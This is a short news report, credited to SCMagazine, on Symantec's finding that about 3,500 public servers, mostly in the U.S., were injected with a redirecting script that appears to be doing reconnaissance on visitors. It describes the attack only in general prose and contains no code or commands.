Symantec reported the worldwide infection of 3,500 public servers of which 75% are in the U.S.

The malicious script redirects users to other compromised websites that could be used to download malware. The malware is as yet not delivering malware, but could be used as a recon effort. At this time no malware was associated with this injection attack and does not lead to any malicious downloads.

Christian Tripputi, a security support manager for Symantec, said: "It is likely that the attacks are a reconnaissance activity to learn more about users and utilize that information in another attack. The possibilities for future attacks include the delivery of advertisements, SEO poisoning attacks, or criminals modifying the code to deliver malware and compromise unprotected users."


The attack's modus operandi has a compromised page being loaded on user's browser when that person visits the site. The malicious script then waits 10 seconds and then runs remote JavaScript code, which then runs several additional scripts to hide the malicious code.

The servers are generally business, .edu and government types.

Source: SCMagazine